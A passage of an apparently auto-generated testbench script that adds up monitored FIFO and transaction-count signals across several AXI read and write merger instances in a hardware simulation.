counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge214.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge215.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge3.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge4.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge5.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_win_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.a_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_b_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_out_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_out_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_win_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.b_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_b_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_win_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.c_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_b_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_win_fifo.count")
counts += monitorStuff("tb.dut.merge6.axi_wr_4_merger.d_win_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.a_rcount")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.b_rcount")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.c_rcount")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.d_rcount")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.a_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.a_ids_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.b_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.b_ids_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.c_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.c_ids_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.d_ar_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_rd_4_merger.d_ids_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.panic_acount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.panic_bcount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.panic_ccount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.panic_dcount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_bcount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.b_bcount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.c_bcount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.d_bcount")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_aw_fifo.int_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_b_fifo.next_count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_b_fifo.count")
counts += monitorStuff("tb.dut.merge7.axi_wr_4_merger.a_win_fifo.count")
